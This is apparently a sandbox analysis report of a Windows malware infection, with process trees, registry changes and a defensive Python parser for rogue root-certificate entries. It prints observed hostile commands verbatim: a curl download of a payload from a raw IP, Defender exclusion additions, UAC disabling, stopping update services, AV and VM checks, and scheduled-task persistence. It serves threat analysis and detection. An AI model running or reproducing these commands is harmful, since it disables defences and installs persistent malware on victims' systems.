| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = (binary certificate blob not reproduced) | C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe | N/A |
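A new key under SystemCertificates\ROOT\Certificates is a machine-wide trusted root, so the thumbprint in the key name (F1A578C4CB5DE79A370893983FD4DA8B67B2B064) is the indicator to sweep for, and the Blob value is where the certificate itself lives. That value is a serialized list of certificate-context properties, each record being a DWORD property id, a DWORD reserved field (observed as 1), a DWORD length and the data; the DER certificate is property 0x20 and its SHA-1 is property 3, and the key name must equal the SHA-1 of the DER bytes. The Python below is an added example for this page, not part of the sandbox report: it parses that layout, recovers the DER and checks it against the key name. Because the page does not reproduce the blob, the input is a constructed stand-in built with the same record layout, and it is not a real certificate.

```python
"""Parse a SystemCertificates ...\\Certificates\\<thumbprint>\\Blob value (added example)."""
import hashlib
import struct

CERT_SHA1_HASH_PROP_ID = 3   # property 3: 20-byte SHA-1 of the encoded certificate
CERT_CERT_PROP_ID = 32       # property 0x20: the DER-encoded certificate itself


def parse_cert_blob(blob: bytes) -> dict:
    """Split a serialized certificate-context blob into {property_id: data}.

    Record layout: <DWORD id><DWORD reserved><DWORD length><length bytes>, little-endian.
    Raises ValueError on a truncated or inconsistent blob rather than returning partial data.
    """
    props = {}
    off = 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated property header at offset {off}")
        prop_id, _reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if off + length > len(blob):
            raise ValueError(f"property {prop_id} claims {length} bytes past end of blob")
        props[prop_id] = bytes(blob[off:off + length])
        off += length
    return props


def verify_cert_entry(key_name: str, blob: bytes) -> dict:
    """Recover the DER certificate and check that the registry key name is its SHA-1 thumbprint."""
    props = parse_cert_blob(blob)
    der = props.get(CERT_CERT_PROP_ID)
    if der is None:
        raise ValueError("blob carries no certificate property (0x20)")
    thumbprint = hashlib.sha1(der).hexdigest().upper()
    stored = props.get(CERT_SHA1_HASH_PROP_ID)
    return {
        "thumbprint": thumbprint,
        "key_name_matches": thumbprint == key_name.strip().upper(),
        # absent hash property is tolerated; a present one must agree with the DER
        "stored_hash_matches": stored is None or stored.hex().upper() == thumbprint,
        "der": der,
    }


def build_cert_blob(der: bytes) -> bytes:
    """Serialize certificate bytes in the same record layout; used only to build offline test input."""
    sha1 = hashlib.sha1(der).digest()
    return (struct.pack("<III", CERT_SHA1_HASH_PROP_ID, 1, len(sha1)) + sha1
            + struct.pack("<III", CERT_CERT_PROP_ID, 1, len(der)) + der)


# Constructed stand-in for a DER certificate. It is NOT a real certificate and NOT the blob
# written by newbundle2.exe, whose contents are not reproduced on this page.
SAMPLE_DER = b"\x30\x82\x01\x00" + b"constructed-sample-certificate-bytes"
SAMPLE_BLOB = build_cert_blob(SAMPLE_DER)
SAMPLE_KEY_NAME = hashlib.sha1(SAMPLE_DER).hexdigest().upper()

# Thumbprint of the root certificate the sandbox saw newbundle2.exe install (from the row above).
OBSERVED_ROOT_THUMBPRINT = "F1A578C4CB5DE79A370893983FD4DA8B67B2B064"


if __name__ == "__main__":
    result = verify_cert_entry(SAMPLE_KEY_NAME, SAMPLE_BLOB)
    print(result["thumbprint"], result["key_name_matches"], result["stored_hash_matches"])
    print(verify_cert_entry(OBSERVED_ROOT_THUMBPRINT, SAMPLE_BLOB)["key_name_matches"])
```

On a live host the blob comes from `winreg.QueryValueEx` on `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\<thumbprint>` (value name `Blob`); the returned `der` can be written to a file and read with `openssl x509 -inform der -noout -text` to see who the attacker-installed root claims to be. A key whose name does not match the SHA-1 of the embedded certificate is itself worth flagging, since Windows computes the name from the certificate when the store API is used.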
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\ProgramData\tst\remcos.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe
"C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Users\Admin\AppData\Local\Temp\Files\4.exe
"C:\Users\Admin\AppData\Local\Temp\Files\4.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 768318
C:\Windows\SysWOW64\findstr.exe
findstr /V "PhoneAbcSchedulesApr" Nbc
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Challenged + Diy + Teachers + California + Mba + Yarn + Payable + Zdnet + Plumbing + Pe + Trick + Betting + Absence + Motorcycles + Man + Analyst + Max + Patrick + Pg + Exemption + Sight 768318\B
C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
768318\Paraguay.pif 768318\B
C:\Windows\SysWOW64\timeout.exe
timeout 5
C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & echo URL="C:\Users\Admin\AppData\Local\TradeInsight Technologies\TradeWise.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & exit
C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\Files\2020.exe
"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"
C:\Users\Admin\AppData\Local\Temp\Files\2020.exe
"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe
C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe
C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Users\Admin\AppData\Local\Temp\Files\mi.exe
"C:\Users\Admin\AppData\Local\Temp\Files\mi.exe"
C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe
"C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"
C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe
"C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pHash.bat
C:\Windows\system32\curl.exe
curl -o "pHash" "http://144.172.71.105:1338/nova_flow/patcher.exe?hash"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\VdjkHVtJ.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VdjkHVtJ" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDAAB.tmp"
C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe
"C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"
C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe
"C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 578678
C:\Windows\SysWOW64\findstr.exe
findstr /V "PEACEFOLKSEXUALISLANDS" Hill
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y
C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif
Cooper.pif y
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe
"C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe"
C:\Users\Admin\AppData\Local\Temp\Files\pei.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"
C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe
"C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe"
C:\Users\Admin\AppData\Local\Temp\3188116601.exe
C:\Users\Admin\AppData\Local\Temp\3188116601.exe
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Users\Admin\AppData\Local\Temp\223522870.exe
C:\Users\Admin\AppData\Local\Temp\223522870.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\543810920.exe
C:\Users\Admin\AppData\Local\Temp\543810920.exe
C:\Users\Admin\AppData\Local\Temp\1657333799.exe
C:\Users\Admin\AppData\Local\Temp\1657333799.exe
C:\Users\Admin\AppData\Local\Temp\864131738.exe
C:\Users\Admin\AppData\Local\Temp\864131738.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Users\Admin\AppData\Local\Temp\1487620755.exe
C:\Users\Admin\AppData\Local\Temp\1487620755.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe"
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\install2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\install2.exe"
C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe
"C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\kxfh9qhs.exe
"C:\Users\Admin\AppData\Local\Temp\Files\kxfh9qhs.exe"
C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe
"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"
C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe
"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"
C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe
"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"
C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe
"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\Files\aqbjn3fl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\aqbjn3fl.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4848 -ip 4848
C:\Users\Admin\AppData\Local\Temp\Files\IATInfect2008_64.exe
"C:\Users\Admin\AppData\Local\Temp\Files\IATInfect2008_64.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'
C:\Users\Admin\AppData\Local\Temp\Files\leto.exe
"C:\Users\Admin\AppData\Local\Temp\Files\leto.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\Files\DriverHost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\DriverHost.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Sync.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Sync.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4468 -ip 4468
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 184
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe
"C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe"
C:\Users\Admin\AppData\Local\Temp\Files\sam.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sam.exe"
C:\Users\Admin\AppData\Local\Temp\Files\defender64.exe
"C:\Users\Admin\AppData\Local\Temp\Files\defender64.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"
C:\Users\Admin\AppData\Local\Temp\Files\r2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\r2.exe"
C:\Users\Admin\AppData\Local\Temp\Files\steel.exe
"C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe"
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\pghsefyjhsef.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pghsefyjhsef.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get Model
C:\Windows\system32\findstr.exe
findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"
C:\Users\Admin\AppData\Local\Temp\Files\LoadNew.exe
"C:\Users\Admin\AppData\Local\Temp\Files\LoadNew.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ATLEQQXO.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ATLEQQXO.exe"
C:\Users\Admin\AppData\Local\Temp\pyexec.exe
"C:\Users\Admin\AppData\Local\Temp\pyexec.exe"
C:\Users\Admin\AppData\Local\Temp\Files\ew.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"
C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe"
C:\Users\Admin\AppData\Local\Temp\Files\s.exe
"C:\Users\Admin\AppData\Local\Temp\Files\s.exe"
C:\ProgramData\wvtynvwe\AutoIt3.exe
"C:\ProgramData\wvtynvwe\AutoIt3.exe" C:\ProgramData\wvtynvwe\clxs.a3x
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\Files\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\Files\M5iFR20.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Users\Admin\AppData\Local\Temp\Files\marsel.exe
"C:\Users\Admin\AppData\Local\Temp\Files\marsel.exe"
C:\Users\Admin\AppData\Local\Temp\Files\stealc_daval.exe
"C:\Users\Admin\AppData\Local\Temp\Files\stealc_daval.exe"
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"
C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe
"C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe"
C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"
C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe
C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe'
C:\Users\Admin\AppData\Local\Temp\Files\Statement-110122025.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Statement-110122025.exe"
C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\c13606fe9009f11d\setup.msi"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe
"C:\Users\Admin\AppData\Local\Temp\Files\needmoney.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F3FD84A91624CE65960EB9CC6DEDC722 C
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"' & exit
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp979A.tmp.bat""
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI91CE.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241080453 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe
"C:\Users\Admin\AppData\Local\Temp\Files\qth5kdee.exe"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"'
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Users\Admin\AppData\Local\Temp\svchost015.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Users\Admin\AppData\Local\Temp\update.exe
"C:\Users\Admin\AppData\Local\Temp\update.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\j62r8dhpa1.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Local\Temp\Files\7z.exe
"C:\Users\Admin\AppData\Local\Temp\Files\7z.exe"
